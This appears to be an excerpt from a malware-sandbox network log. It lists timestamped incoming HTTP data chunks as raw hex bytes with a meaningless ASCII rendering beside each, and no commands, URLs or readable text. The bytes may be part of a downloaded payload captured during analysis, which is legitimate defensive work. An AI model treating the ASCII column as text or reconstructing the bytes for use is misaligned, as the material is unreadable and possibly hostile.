                                                                                                                  2023-08-29 17:16:42 UTC1008INData Raw: 14 18 4a 51 a9 f1 c9 a6 e4 49 f9 c9 59 31 28 95 bd 7a 19 15 cc 0c c5 86 12 19 94 c0 00 b9 7d 73 64 4b 90 b5 ad c1 92 93 49 e9 82 59 f0 71 e8 68 41 c4 7d 80 45 b6 2a 02 cc dc 3b 54 c5 49 90 45 35 b8 a1 d8 ce 49 50 c4 7e 83 6d d9 14 b6 39 06 1c a0 db d9 65 40 51 d4 cd c0 94 a4 e4 48 28 68 65 c9 67 50 66 b9 22 20 4a cc bf 41 44 1b 98 02 3f cc 25 02 46 c9 49 d0 cd 4d 8c 5f f4 49 4c 2c 76 bf 5f d8 83 cc 66 60 45 48 df 55 3f 02 79 d0 25 35 a1 61 47 c4 91 10 45 c9 1b 6d d4 48 19 a4 32 c3 18 58 51 cc 67 70 45 08 6a d1 4a ff d9 d0 c6 b1 7f af 63 3d 4f 53 c5 b1 3f a4 53 ca e1 fe 35 24 11 28 73 3d 39 10 7b 3d 1e 53 45 89 85 eb 83 3e 05 16 c0 48 38 d6 44 a2 a3 53 ad 2e 6d 98 b7 64 90 80 40 3d f2 a0 f4 52 91 98 31 40 3a d7 45 a2 87 93 42 01 18 2f c0 c8 14 3b ca ad 19
                                                                                                                  Data Ascii: JQIY1(z}sdKIYqhA}E*;TIE5IP~m9e@QH(hegPf" JAD?%FIM_IL,v_f`EHU?y%5aGEmH2XQgpEjJc=OS?S5$(s=9{=SE>H8DS.md@=R1@:EB/;
                                                                                                                  2023-08-29 17:16:42 UTC1012INData Raw: 41 a2 b9 d0 46 c2 19 d0 84 a1 1c f5 ba 46 19 d0 45 01 6d e9 0d 3d 3f 98 e5 3d 0a 98 30 77 99 cc 55 89 19 58 5d 97 e0 90 55 71 f2 fe 83 4a 48 91 51 71 f2 ce 83 4a f0 12 46 47 1c 16 46 88 d8 d3 ad 9c 8d 2b ba 49 92 18 76 b6 9d 1b 31 40 1b e9 85 74 6d d3 c6 80 1b 26 55 4f 39 df c0 88 6c 54 8e 3c 99 c3 7c 37 11 df c1 c6 19 d3 f4 c8 1e df c1 cc 59 d2 85 60 e5 50 64 f6 5a e6 c6 60 59 d2 44 65 d9 90 07 58 12 94 0d 22 98 97 45 4d 41 d5 41 4d 58 e4 05 5d 6d d6 77 cb 10 10 d2 95 4d f4 7d 96 19 30 b3 8d 1c aa 4f 94 c1 d0 98 4c c5 97 59 31 f2 c1 43 95 99 f6 44 4c 58 a5 4f 94 1c e0 b5 7a 05 a8 84 63 18 85 01 6d 3b e8 45 1f f0 28 be 8d 4c b0 b3 5b d8 51 1b 3d 13 d5 5e a2 1d 53 a5 29 15 2d b3 88 18 f3 07 4c 5b cc 94 0b 1c 2b c1 82 18 d5 4c 0d 7a 12 41 a3 e7 11 67 0e db
                                                                                                                  Data Ascii: AFFEm=?=0wUX]UqJHQqJFGF+Iv1@tm&UO9lT<|7Y`PdZ`YDeX"EMAAMX]mwM}0OLY1CDLXOzcm;E(L[Q=^S)-L[+LzAg
                                                                                                                  2023-08-29 17:16:42 UTC1016INData Raw: 14 a1 1b d3 83 49 1d e3 ba a2 1b 5b 55 b2 f1 3e 3e 2b 04 f3 ce b2 79 3b 5a 1e f1 d4 b5 48 08 c7 b4 60 08 c7 b2 bf da d0 a1 e9 1b d3 ce 7b 64 c1 0a c2 11 70 f7 79 3c 51 8c e8 e8 f4 c0 b6 90 d8 26 69 4b 60 62 14 08 cb 81 6a 1a 73 03 78 1d 63 40 48 9e 6d 21 69 db d0 44 21 39 21 44 ea 12 dd 21 69 01 df c1 bc 69 c4 3e 52 15 51 23 ad 05 fa e5 40 f0 50 95 58 52 cf f5 03 11 cc 60 62 a9 d1 4e 8a f2 ce 54 a3 05 df cf 1b bb 89 59 6c 73 d1 14 46 d1 90 cc 0f 05 39 7a 3c 3d d1 2a 6b 18 95 65 48 16 c9 42 50 9c e8 ba a0 6a 11 25 6a 21 60 ff 8a a6 79 e4 cb 6d cb c0 cd 0f 53 c1 5b 9a 54 dd 42 92 17 1a cd 49 54 81 36 ea 6a 03 92 f9 d9 55 10 62 aa be 09 20 93 e4 b8 af e5 c1 8a 6d b1 6a 8e 79 14 44 ad 0c cf 44 b7 e6 db 8a c0 da a1 66 d6 41 b0 ac 8f e3 15 fc 48 53 f0 0b 69 c0
                                                                                                                  Data Ascii: I[U>>+y;ZH`{dpy<Q&iK`bjsxc@Hm!iD!9!D!ii>RQ#@PXR`bNTYlsF9z<=*keHBPj%j!`ymS[TBIT6jUb mjyDDfAHSi
                                                                                                                  2023-08-29 17:16:42 UTC1020INData Raw: 57 49 6a 2f 5d 31 19 24 0b 50 61 20 5c 55 61 d5 f4 49 f1 64 45 ea cb c3 3d 95 58 64 45 96 d6 c3 3d 99 ad d0 cb 59 d4 c3 3d 81 ad d0 9e 85 0a d0 3d 48 1b d3 41 4c 1f d7 45 41 10 da 4e 45 14 de 4a 49 09 c1 57 5a 0d c5 53 5e 19 c8 5c 53 02 cc 58 57 06 d0 65 68 3b f3 61 6c 3f f7 45 61 30 fa 6e 65 34 fe 6a 49 29 e1 77 7a 2d e5 73 7e 19 e8 7c 73 22 ec 78 77 26 d0 05 08 5b 93 01 0c 5f 97 45 01 50 9a 0e 05 54 9e 0a 49 49 81 17 1a 4d 85 13 1e 19 88 1c 13 42 8c 18 17 46 d0 25 28 7b b3 21 2c 7f b7 45 21 70 ba 2e 25 74 be 2a 49 69 a1 37 3a 6d a5 33 3e 19 a8 3c 33 62 ac 38 37 66 90 45 16 37 fc 45 16 69 dc 7e 84 29 d0 78 79 19 b0 55 49 24 11 45 46 19 2f 4a 49 16 d0 4a 49 16 d0 4a 49 16 d0 4a 49 16 d0 fa 46 19 df 45 46 19 df 45 46 19 d0 45 69 07 d0 cb 61 0f d0 fa 48 06
                                                                                                                  Data Ascii: WIj/]1$Pa \UaIdE=XdE=Y==HALEANEJIWZS^\SXWeh;al?Ea0ne4jI)wz-s~|s"xw&[_EPTIIMBF%({!,E!p.%t*Ii7:m3><3b87fE7Ei~)xyUI$EF/JIJIJIJIFEFEFEiaH
                                                                                                                  2023-08-29 17:16:42 UTC1024INData Raw: a3 1c e9 d0 35 bd 19 b8 f5 49 63 e0 45 69 51 ef 7a 69 68 cc 3e 2f 69 ad 38 ce 68 d0 45 7e 28 e0 2b 26 77 fd 34 7b 1f fd b4 33 a9 d1 20 64 69 b1 37 85 78 bd f5 6f eb f8 30 27 e9 84 05 6f 60 61 47 25 76 60 7c 39 19 30 3e fb 1d a3 8d 21 76 a2 d4 49 7a b8 85 76 e9 d0 49 3f 76 81 cc 79 32 b5 29 25 70 80 35 3a 70 a3 35 62 35 18 45 65 01 fe 6b 67 6b aa 25 3c 76 a7 6d 11 19 f9 1e 79 1d 50 46 29 b6 d7 45 4e 28 e9 94 cb e8 d2 26 25 70 ea 7f f1 69 b9 2b e8 34 a1 70 bb 19 b1 44 37 4f ec 77 4e a8 d7 62 78 58 b1 85 45 60 f0 28 26 6c a3 65 39 69 b5 36 47 69 70 15 3b 27 e0 45 2e 7c be 20 46 09 e2 e6 47 e9 d0 6a 4e 34 d0 7f 73 5c 60 47 3c 5c 4a 26 3a 6c 10 46 3c 77 be 04 d9 69 da e7 0e 39 60 42 d8 9d d0 65 49 7c be 30 24 68 d7 26 26 ae c5 44 f8 19 52 c8 2f 79 d7 b7 49 30
                                                                                                                  Data Ascii: 5IcEiQzih>/i8hE~(+&w4{3 di7xo0'o`aG%v`|90>!vIzvI?vy2)%p5:p5b5Eekgk%<vmyPF)EN(&%pi+4pD7OwNbxXE`(&le9i6Gip;'E.| FGjN4s\`G<\J&:lF<wi9`BeI|0$h&&DR/yI0
                                                                                                                  2023-08-29 17:16:42 UTC1028INData Raw: a6 49 25 d0 05 85 8a 09 d9 85 99 ef 5f e4 d1 cc ab 0c e9 d3 45 1f 56 a5 3a 97 d5 ef 64 69 4a 47 86 c9 41 20 43 46 7b d0 54 64 39 1d 7a 0a ab ea 4d db 1e 31 b5 66 d9 c0 39 ab 19 b1 88 76 5b 7e 79 e6 a9 d0 61 b2 25 d0 a2 32 d0 4f 45 ea d4 ef 6e 11 f3 79 10 4b 5e 20 2c 24 c1 dd 20 ac d4 50 7a 77 4c d6 9e c3 1e 20 6d 49 fc bf 18 7b 3e 1e 7a 4f 39 71 cb 49 50 09 b5 4c c9 70 45 85 1e b9 8b 76 5e 2d 93 41 09 63 93 b9 28 30 9b 26 fc d0 ef 87 26 f0 9e 93 d7 49 47 27 e9 cd 7c fa 42 1b a9 87 19 ef ac 40 92 ac a1 17 de d1 b5 12 a5 74 fc 67 d6 ef c6 69 27 bf 5f 23 b5 20 7f 67 a9 d0 1a f9 69 1f 7a 78 4a 20 4d fa 80 11 b5 46 a1 88 e4 e6 19 62 8a 76 05 43 db a3 da d2 29 b9 0a 23 d2 37 ae 24 8a c9 26 bf 6b 31 ab 0c 50 b9 18 d0 60 7a 1f b4 5e 99 26 4d 65 cf e1 c3 f8 32 d9
                                                                                                                  Data Ascii: I%_EV:diJGA CF{Td9zM1f9v[~ya%2OEnyK^ ,$ PzwL mI{>zO9qIPLpEv^-Ac(0&&IG'|B@tgi'_# gizxJ MFbvC)#7$&k1P`z^&Me2
                                                                                                                  2023-08-29 17:16:42 UTC1032INData Raw: 13 c8 78 6a eb 6b cd ef ff 46 4d bc 59 c6 cb ef 15 38 f2 ba 59 9b c9 ef 4d b7 12 01 1c f3 d4 ef 54 39 09 20 e1 65 d0 ef dc 5b 75 f2 93 c0 da ef 26 10 aa 59 b0 d3 af ef 42 15 0d e3 63 ef 88 ec 5d 64 5d 84 be 68 e0 ef 42 15 0d e3 63 ef b8 6c 5d 64 5d 84 be 68 10 10 42 15 0d e3 63 ef b8 ec 5d 64 5d 84 be 68 10 90 45 49 19 28 ba b6 e6 2f 45 49 19 28 ba b6 e6 2f 45 49 19 d0 45 49 19 d0 10 1c 4c 85 10 1c dc 6f 76 7a 2a e3 76 7a aa 6f f2 24 c2 66 28 92 bf 6f ac eb 92 fe ff a1 8f ef 76 7a 2a e3 76 7a aa ef 82 38 05 17 34 55 86 ef 10 1c 4c 85 10 1c dc ef 0a a5 dd 9e a9 8d 88 ef f2 24 c2 66 28 92 bf ef 61 3b 61 a8 3d e1 9e ef df d0 80 49 dc d0 95 ef ba b6 e6 2f ba b6 e6 af 45 49 19 d0 45 49 19 d0 45 49 19 d0 45 89 e6 2f 45 49 19 d0 45 49 e9 ef 45 49 19 d0 45 49 f9
                                                                                                                  Data Ascii: xjkFMY8YMT9 e[u&YBc]d]hBcl]d]hBc]d]hEI(/EI(/EIEILovz*vzo$f(ovz*vz84UL$f(a;a=I/EIEIEIE/EIEIEIEI
                                                                                                                  2023-08-29 17:16:42 UTC1036INData Raw: 9b 75 19 48 c4 56 18 7b fc 76 25 06 6a ca b1 0c af 75 19 ea 4b ed 4d 3b fc 76 5f a4 ca f7 0e 77 ec 75 19 d8 4d 84 b0 fb ff 76 57 52 2c 2b 63 80 9d 75 19 42 da d7 19 bc ff 76 a9 2c 65 69 3c 88 a3 75 19 b1 43 54 40 7c ff 76 44 90 a9 f3 46 ad d9 75 19 26 2b 05 aa 3c ff 76 e2 6c d9 d3 5e d9 f9 75 19 1a 49 78 16 fd fe 76 78 0c ac 36 b8 f8 aa 75 19 85 51 86 75 bd fe 76 70 84 4c a4 26 41 a5 75 19 c1 fe 63 d5 7d fe 76 4f 33 8a 63 ce 2a f3 75 19 a7 72 01 34 3e fe 76 b4 c6 c8 11 42 96 f1 75 19 d6 84 62 89 fe f9 76 41 5e 65 5c 72 be a5 75 19 95 d5 90 ed be f9 76 c2 84 ec 61 94 fb a0 75 19 16 9b 1c 42 7f f9 76 cf 59 5e 9d 1f 4c a1 75 19 f7 a2 ed da 3f f9 76 73 a5 64 7d a1 45 ec 75 19 c6 a0 83 34 e0 f8 76 cf c7 ed be bb 3f a4 75 19 81 50 85 80 a0 f8 76 1c 6a a0 cf a6
                                                                                                                  Data Ascii: uHV{v%juKM;v_wuMvWR,+cuBv,ei<uCT@|vDFu&+<vl^uIxvx6uQuvpL&Auc}vO3c*ur4>vBubvA^e\ruvauBvY^Lu?vsd}Eu4v?uPvj
                                                                                                                  2023-08-29 17:16:42 UTC1040INData Raw: 3e 59 a4 d2 23 00 f6 ef 30 59 4a cf b7 0c f6 ef 39 f6 de 79 30 0b f6 ef 74 fd 25 4f b5 77 f6 ef d8 61 d2 2c 27 72 f6 ef c3 a4 9a 6f 89 7e f6 ef cd 14 76 34 68 7d f6 ef 4b 19 94 b8 c3 79 f6 ef 49 45 cc 98 93 65 f6 ef dc 73 2c 52 58 60 f6 ef 0c 90 8a c1 19 6c f6 ef 23 65 d7 23 d4 68 f6 ef af f9 a1 f5 fa 54 f6 ef 0b 47 06 74 a6 50 f6 ef 61 41 dd bb ba 5c f6 ef c5 26 78 a9 57 5b f6 ef 6f 5d b1 19 59 47 f6 ef d9 fc 26 89 5b 43 f6 ef 88 ba df f4 52 4f f6 ef 87 76 ca f8 42 4b f6 ef ab 82 e9 b1 ab b4 f7 ef bd 70 60 63 fd be f7 ef 7c 5c 14 e9 17 a6 f7 ef 60 db fe 82 8d af f7 ef 03 e6 ba 33 5f 97 f7 ef b9 f0 59 1d 0c 9c f7 ef 2f 51 39 21 11 85 f7 ef f6 4a 1a e0 79 8a f7 ef 5a 7b 11 ba ba f0 f7 ef 84 39 b0 ae db f9 f7 ef 52 65 a0 9c 5c ee f7 ef 05 ae 46 62 2a d4 f7
                                                                                                                  Data Ascii: >Y#0YJ9y0t%Owa,'ro~v4h}KyIEes,RX`l#e#hTGtPaA\&xW[o]YG&[CROvBKp`c|\`3_Y/Q9!JyZ{9Re\Fb*
                                                                                                                  2023-08-29 17:16:42 UTC1044INData Raw: 1a 76 c8 5f 1b 76 94 2d 18 76 5d cf 18 76 6d 21 1e 76 4c 6d 1f 76 d5 52 1c 76 a4 91 1d 76 15 2a 13 76 80 7b 10 76 5c 86 11 76 f6 29 17 76 6a 46 14 76 b4 fb 15 76 6f 69 0b 76 bf ef 08 76 0a 6e 0e 76 88 e4 0f 76 e8 72 0d 76 18 d9 02 76 97 b6 00 76 7b 6b 06 76 5b d7 07 76 eb 99 05 76 28 53 7b 76 a2 62 79 76 51 08 7f 76 92 23 7d 76 2b d4 72 76 ff d9 70 76 53 d4 76 76 e2 22 75 76 96 05 6b 76 8a 7b 69 76 94 a4 6f 76 e0 ff 6d 76 50 0d 60 76 fd ab 66 76 38 db 64 76 55 5a 5b 76 84 28 5e 76 27 85 5c 76 27 4f 53 76 80 05 56 76 35 27 55 76 ad d2 4b 76 d3 26 4f 76 c3 01 42 76 05 42 41 76 93 e5 44 76 b1 a3 be 77 b8 e8 b1 77 d4 63 a9 77 fc 0d a1 77 5e 7e 99 77 96 ca 91 77 09 c6 8e 77 11 41 84 77 6d a7 f2 77 5e 7f e9 77 6f c5 e4 77 fa a8 d1 77 fa 40 c3 77 d6 02 28 77 31
                                                                                                                  Data Ascii: v_v-v]vm!vLmvRvv*v{v\v)vjFvvoivvnvvrvvv{kv[vv(S{vbyvQv#}v+rvpvSvv"uvkv{ivovmvP`vfv8dvUZ[v(^v'\v'OSvVv5'UvKv&OvBvBAvDvwwcww^~wwwAwmw^woww@w(w1
                                                                                                                  2023-08-29 17:16:42 UTC1048INData Raw: 6f ce ea 0d c7 a0 9b ec 05 f2 78 d5 22 e5 c4 ef 6a 32 08 29 1e 98 d7 ec 55 5d 4d db 98 09 c6 ef ea 77 07 b9 76 67 a6 ec 8d 79 c2 44 3b 2c f9 ef f4 ac 1d 65 60 5c d6 ec ed 9b e2 4b 18 6c f8 ef 58 b8 fa c1 60 9d 87 ec f5 b7 c7 7b 4e a9 f8 ef 23 5f 47 53 19 d2 a6 ec 75 c7 29 89 cb dc fb ef 9b 06 d7 c3 26 91 82 ec fd 7e d7 cc b5 0c fa ef 65 ab e1 f6 07 69 a3 ec b5 df 87 68 7a b8 fa ef 6d 7b 50 8a 39 bf d9 ec a5 d7 3f 73 ca de fd ef ce 1d e7 80 76 01 bb ec 5d 4f 90 ab b0 71 fc ef 9a 13 5b 65 0d ad d3 ec 5d d2 0f 57 cc 9c fc ef 8f ae dc 9b cb 4b 79 ec c5 a9 3a e9 23 24 ff ef 67 f3 b9 50 e9 01 d2 ec 75 0f 61 15 e2 49 fe ef 54 1b bc fd 8e 3a a7 ec 1d 78 44 6d 2e c6 fe ef 31 4a 81 d8 2f 09 d0 ec 0d c3 0c 67 95 50 f1 ef 7d 2b a8 3e 01 69 da ec b5 b8 4e 2f b0 d6 f1
                                                                                                                  Data Ascii: ox"j2)U]MwvgyD;,e`\KlX`{N#_GSu)&~eihzm{P9?sv]Oq[e]WKy:#$gPuaIT:xDm.1J/gP}+>iN/
                                                                                                                  2023-08-29 17:16:42 UTC1052INData Raw: 58 40 09 f5 b6 05 fd d2 7b 23 1e b8 47 f5 1a ee b5 76 6d a9 80 12 19 b7 d7 8c a6 18 2d e7 20 58 7e 8e f8 d2 7b 94 3c 5b 43 77 19 a9 57 b3 6a b8 7f f7 a6 50 7e bf 1f e8 18 62 c7 d2 5a 41 90 dd 1b 4f 06 1f d0 22 9f d0 e4 35 aa 6f 26 e0 b7 76 4d ab 64 08 44 56 f9 3d 69 2e 18 d4 3a b9 26 8a 67 d4 8a 3a 45 42 bf 6f 43 d6 cc fe 43 cd 8d 02 44 56 b9 5d 97 3c 1f cf 45 b2 70 c4 44 4f b4 43 fa c9 12 76 2c 75 a1 28 8d 48 06 c0 85 50 74 b2 43 56 28 bd 28 49 0e fe fc 3a a6 fc f1 60 09 6c e3 5e a0 52 6a 51 3e ee 70 cf 16 85 47 49 dc 51 4e 48 14 6f 54 4c 1b d0 c4 cd 12 75 7a 53 b9 d1 44 49 18 fa fa 5e 75 11 53 25 19 11 13 f6 2d 17 13 ec fa d8 58 8e 27 53 4e b3 27 d0 45 09 79 ca 24 fd 89 ed c2 4a 59 d0 11 b2 38 69 7a 3a 69 d3 45 67 93 c9 26 72 9a 18 8c 69 74 e0 1a 6d 59
                                                                                                                  Data Ascii: X@{#Gvm- X~{<[CwWjP~bZAO"5o&vMdDV=i.:&g:EBoCCDV]<EpDOCv,u(HPtCV((I:`l^RjQ>pGIQNHoTLuzSDI^uS%-X'SN'Ey$JY8iz:iEg&ritmY
                                                                                                                  2023-08-29 17:16:42 UTC1056INData Raw: a5 36 d9 3f 1c 57 0e 77 c5 76 c2 84 8a 76 03 6d a5 14 19 d0 82 4b 89 ee ef 76 9f 90 96 99 d1 87 97 68 f9 51 86 49 34 e3 77 e4 26 cf 01 90 11 28 9e 33 f9 d7 e5 9f 69 c1 45 61 a9 ef 33 19 b6 f8 ce 4b ea 20 45 29 e8 3c 5a d5 a8 50 7a 9d 4c 83 5b 76 f9 20 4c 49 d9 b5 b8 52 0c 63 7a dc 39 b7 c9 4d 99 32 b5 03 79 15 45 c9 3e 43 f1 76 ea 75 27 59 d4 7c 81 66 e9 da ac 17 6a d0 40 ff 26 4f 38 e8 3a 1f 47 8a e9 99 e5 03 94 a7 2e fe 19 ef 3f 27 b9 c2 ad 4a 05 d1 b5 4a fd 9e 4e 9f a1 ef c7 69 55 9e 89 ac 19 20 49 09 3d d0 67 fd 2a 6a 7a 7c 4e b7 4d 7d 69 21 b4 08 be 84 f3 dc 19 6b 7a 8e 57 a6 61 17 17 d2 6c b9 42 39 47 6f f3 6c 7a 49 d2 1b 6b cb 30 01 ae 75 19 d0 e5 25 d8 64 07 f7 26 50 ac 04 94 23 4a ac 3c 20 42 49 73 61 40 c4 a6 ef e2 3e 39 67 e7 ec 97 fa b5 19 25
                                                                                                                  Data Ascii: 6?WwvvmKvhQI4w&(3iEa3K E)<ZPzL[v LIRcz9M2yE>Cvu'Y|fj@&O8:G.?'JJNiU I=g*jz|NM}i!kzWalB9GolzIk0u%d&P#J< BIsa@>9g%
                                                                                                                  2023-08-29 17:16:42 UTC1060INData Raw: 97 28 19 24 b8 cf 26 27 b3 90 5f d0 b9 d7 25 ed 45 49 63 e1 45 6c ff 46 7a 92 0d 86 21 41 17 ef 00 b9 19 42 d2 2b 03 d0 e4 76 cf e6 91 9e 45 42 47 04 e9 d0 5a e9 18 6b e3 76 59 a0 9e 70 6d 8e dc b9 1b 50 45 15 7a 63 0b e5 26 d9 93 69 d3 6d d7 c8 53 20 45 7a 99 d0 ce a3 a9 ef a0 52 36 44 4d de 0e 9e b5 4b b0 b2 b5 e0 19 63 7a 0d 43 c5 6b a6 08 d2 75 b9 19 28 0a 21 7c 66 7a 09 b6 ef ec c4 eb 54 b4 49 44 d0 76 f5 00 69 7a 36 e7 d3 45 a4 9b b0 61 74 19 90 85 49 ce 69 83 f2 26 88 63 2c 11 92 ad fe e9 d7 c5 95 f8 a2 45 3b a7 ef 19 eb 2a f3 ec 4b 37 20 40 89 17 52 92 c5 d9 d0 7a 4f 1b 64 54 8c 5a e5 44 b9 19 e3 7f c6 c5 11 7a 05 39 a4 28 e2 95 89 b5 4b 59 7f 45 6e 63 fb 86 76 a8 f2 20 59 e4 71 ee 4e e9 d5 31 05 4f d0 33 8d 26 a0 ca d2 3d 4f 47 8a e9 db 25 d9 7d
                                                                                                                  Data Ascii: ($&'_%EIcElFz!AB+vEBGZkvYpmPEzc&imS EzR6DMKczCku(!|fzTIDviz6EatIi&c,E;*K7 @RzOdTZDz9(KYEncv YqN1O3&=OG%}
                                                                                                                  2023-08-29 17:16:42 UTC1064INData Raw: e6 99 de b7 fa 34 2e 53 55 93 8b 3c 60 b8 10 2f c6 46 19 b7 fa 24 7e 04 74 6f b2 d1 b4 f7 19 ab 71 1e 7f 6f bb 69 84 66 0c 5a e4 21 e9 51 0e d0 a7 d7 7c 6f 38 f0 56 74 41 f3 b1 20 84 49 21 03 c9 af 19 b4 fa ba 46 8c f9 c5 9b d1 b5 f9 19 80 ea 7d 37 b4 fa 09 0f 13 f6 e1 03 e6 b4 53 59 d0 ee 90 6c b3 fa d0 c7 d4 4d be 2b 39 b4 69 e1 16 3e f4 19 b2 fa aa ac 84 87 1e a4 d1 b5 fd 19 b0 47 52 1c b2 fa c9 f9 fe d1 3b ea ad 53 b8 a5 d0 18 fe 55 b1 fa 84 2f 9d 4d 8c 87 a2 b5 9b 19 00 92 19 19 44 25 f6 e8 1d 7e 8f bc d2 4b b8 1a a0 a6 87 ae 8f fa c9 b0 a6 4b a3 25 50 68 b8 18 d0 10 bf 5f 8e fa 9c ed 64 4d df 92 e9 b4 4e a9 d6 5d 9f 19 8c fa f4 92 d5 e6 85 bb d1 b7 50 ec e3 20 12 a6 58 98 59 a2 77 2e 77 e9 34 45 69 3a d0 0f bd 40 6f 51 6f 11 d5 41 95 34 21 4c 19 97
                                                                                                                  Data Ascii: 4.SU<`/F$~toqoifZ!Q|o8VtA I!F}7SYlM+9i>GR;SU/MD%~KK%Ph_dMN]P XYw.w4Ei:@oQoA4!L
                                                                                                                  2023-08-29 17:16:42 UTC1068INData Raw: f8 49 19 d0 ad 94 06 dc fa d6 82 7d 77 02 90 eb f8 49 19 d0 95 97 a6 db fa 18 79 14 97 91 1c e4 f8 49 19 d0 f1 96 46 db fa 5c be f0 91 42 43 94 f8 49 19 d0 d3 a9 e6 da fa 46 b0 30 73 48 8d e9 f8 49 19 d0 6f a8 a6 da fa f2 9f 7f b7 ef a9 96 f8 49 19 d0 43 ab 46 da fa 41 4d e3 8f eb ed 9b f8 49 19 d0 a5 ab e6 d9 fa da 54 fe f4 9f bb ee f8 49 19 d0 f3 aa 86 d9 fa 09 e1 67 1a b4 df 90 f8 49 19 d0 cf ad 26 d9 fa 5f 28 4c 19 21 4c 35 f9 49 19 d0 1d ac c6 d8 fa 8a fe 72 9a 39 e5 9d f8 49 19 d0 63 af 66 d8 fa cc de 9a fd de 61 e3 f8 49 19 d0 b5 af 06 d8 fa 9e cb 7c 83 53 be cc f8 49 19 d0 f3 ae a6 d7 fa 31 f9 cd 6a 21 15 e7 f8 49 19 d0 7d a1 66 d7 fa 05 84 17 33 14 01 95 f8 49 19 d0 bf a1 06 d7 fa d0 4f 48 98 45 a2 e3 f8 49 19 d0 fd a0 a6 d6 fa 48 aa 92 43 89 6f
                                                                                                                  Data Ascii: I}wIyIF\BCIF0sHIoICFAMITIgI&_(L!L5Ir9IcfaI|SI1j!I}f3IOHEIHCo
                                                                                                                  2023-08-29 17:16:42 UTC1072INData Raw: b1 76 b0 d2 45 35 24 61 c1 bd 26 b4 ce 49 e8 06 f9 75 ed ef 1d 5e 19 79 0c f3 ef 23 7a b7 26 c0 ef e2 8c 62 85 48 16 9d 5a 49 25 a0 b6 76 41 69 88 88 19 4b 6a ba 26 3b 21 7e 82 d0 e6 b9 eb ef e2 fd 9e 5f 45 0a aa 22 7a b7 82 3f 15 49 75 a7 b7 76 f5 35 5d 1a 19 df 78 bb 26 1d 62 13 a6 d0 5b 4d eb ef 21 4c dc b9 45 c4 d5 21 7a d8 8d 2c 83 49 57 46 b4 76 bd b5 86 ab 19 86 24 b8 26 13 78 7b 4e d0 df 64 e8 ef c9 b9 90 94 45 47 e2 20 7a 64 1b 44 0c 49 b1 19 b5 76 1b 07 c3 35 19 8e dc b9 26 84 70 2a 7d d0 62 23 e9 ef 72 8d d8 22 45 b0 22 20 7a 5c 1b d8 3b 49 d4 de b5 76 8b 02 bc 3e 19 e3 80 a6 26 a0 00 25 60 d0 e8 27 f6 ef b8 36 b7 1b 41 b0 00 30 45 4a 23 0c 4c 8e 19 3e 7a e7 44 8e f7 86 6c d0 ab 76 04 0a 22 ae 24 f6 45 a7 26 0f 46 09 86 97 9d 49 f4 ef bb 16 66
                                                                                                                  Data Ascii: vE5$a&Iu^y#z&bHZI%vAiKj&;!~_E"z?Iuv5]x&b[M!LE!z,IWFv$&x{NdEG zdDIv5&p*}b#r"E" z\;Iv>&%`'6A0EJ#L>zDlv"$E&FIf
                                                                                                                  2023-08-29 17:16:42 UTC1076INData Raw: 45 7f cf af 02 f0 a6 6c 97 69 db 12 bc 17 0a 26 4f 6a a8 e0 b8 bb 7f 65 b0 dd ee da 21 82 39 ca 81 c4 5d d5 b2 7f 24 60 65 92 cb aa be 77 ec d0 68 df 19 92 db ec b7 05 fb a6 e1 d0 3c 6c 81 f3 ce f6 c0 ce 45 c3 31 91 51 81 27 15 c8 49 00 60 7f d3 8e ef 16 ab 19 0f 6a 9a 65 75 fb 26 2a d0 23 1e b3 ac 24 f6 da 94 45 40 79 06 0b dc 27 28 ef 49 f9 74 03 8f 7b ef d9 fb 19 5f 2e ea fa a4 fb 40 1d d0 09 95 4b 29 76 f6 7c 33 45 b6 82 3c 44 2a 27 94 db 49 9f 68 23 8c 36 ef 45 09 19 30 a4 2b d5 60 fa 36 89 f0 2e 48 a5 4c 54 bf 13 2a 9d 59 a0 36 f6 36 e6 da e3 6b b6 f0 18 9e 30 24 fb bf 74 75 f9 59 1f ad e7 be ef da df 88 08 d0 37 77 05 14 fb 77 cc be 45 dc ed 33 3f f6 6b de 30 49 f7 cb d5 8a 27 25 06 9d 19 41 56 be 8f ef 29 57 7f d0 73 40 77 43 fb c8 8a bf 45 19 f1
                                                                                                                  Data Ascii: Eli&Oje!9]$`ewh<lE1Q'I`jeu&*#$E@y'(It{_.@K)v|3E<D*'Ih#6E0+`6.HLT*Y66k0$tuY7wwE3?k0I'%AV)Ws@wCE
                                                                                                                  2023-08-29 17:16:42 UTC1080INData Raw: 12 99 26 fc b7 fa 19 10 27 dd dc 6f 05 cf 9a c0 7a f1 17 13 83 58 41 e1 10 49 f9 25 30 80 a6 fa b3 57 19 c8 55 eb e9 ef bd ec 35 d0 93 90 6e 1a fa b3 41 e2 45 0a 48 1f 9d 76 f3 cc 32 49 18 84 f4 8b a6 f3 e2 61 19 10 4a 7e de ef ac 21 5a d0 64 e3 c6 66 fa b9 a2 fd 55 5e 97 1b f3 8f 08 72 68 12 19 5c fe 7f a0 6f f9 6f 48 d0 80 f2 3e 20 7a d2 12 f3 45 95 41 a5 fc f6 9c 99 b9 49 6f 19 6f 9f 26 f1 30 6d 19 66 5b 71 a8 6f 68 01 5f d0 c2 ca 66 12 7a 69 7a b6 45 77 10 36 e6 f6 1f 1a 58 f9 06 7e ed e6 df c1 45 49 99 18 47 49 19 4d 7c 72 d2 ed d2 c7 39 a5 c6 b0 3b 91 06 4d 51 84 15 b2 38 69 b2 c9 8f 9d 04 4a 30 50 23 05 55 f3 c9 0f ec 17 48 73 5d 35 46 02 be d8 a0 1b 5c 82 b5 76 e3 10 04 48 1f d2 47 28 1a 31 10 48 1a 12 47 c1 19 d0 a5 ac 1c 90 5d 64 f8 d9 6f 40 fd
                                                                                                                  Data Ascii: &'ozXAI%0WU5nAEHv2IaJ~!ZdfU^rh\ooH> zEAIoo&0mf[qoh_fzizEw6X~EIGIM|r9;MQ8iJ0P#UHs]5F\vHG(1HG]do@
